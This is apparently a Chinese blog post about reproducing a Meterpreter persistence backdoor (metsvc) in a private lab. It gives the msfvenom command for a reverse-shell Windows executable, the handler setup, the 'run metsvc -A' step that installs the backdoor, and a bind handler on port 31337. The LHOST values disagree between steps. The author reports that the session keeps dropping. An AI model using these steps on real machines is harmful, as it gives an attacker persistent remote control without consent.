meterpreter后门-Metsvc的复现

一、msf生成后门并获得会话

攻击机ip：192.168.3.147 靶机ip：192.168.3.142

先生成一个exe的运行程序，并上传至靶机运行，然后用kali监听

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.3.47 LPORT=4444 -f exe -o /root/桌面/payload2.exe

use exploit/multi/handler 
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.100.130
set LPORT 4444
run

二、执行命令植入后门

在kali获得的会话中运行 run metsvc -A，完成后门植入

去靶机下查看目标文件夹发现上传成功

新建一个msf窗口，并依次运行命令

use exploit/multi/handler 
set payload windows/metsvc_bind_tcp 
set RHOST 192.168.3.142
set LPORT 31337

这里一直会话每次刚创建成功就会断开，查阅文章也没找到解决方法，各位大佬如果找到解决方法可以给小弟教学一波

相关阅读:
JSP内置对象——application,page,pageContext,config,Exception
点击按钮添加一组下拉框，然后改变下拉框的值触发事件
vue基础学习（三）
轻量级quill富文本编辑器
jQuery 文档操作方法
点击识别位置并在该位置下弹出选择框
css样式清零及常用类
vue基础学习（二）
响应式web-媒体查询
在cmd下编译一个简单的servlet时出现程序包javax.servlet不存在

原文地址：https://www.cnblogs.com/BuFFERer/p/12634861.html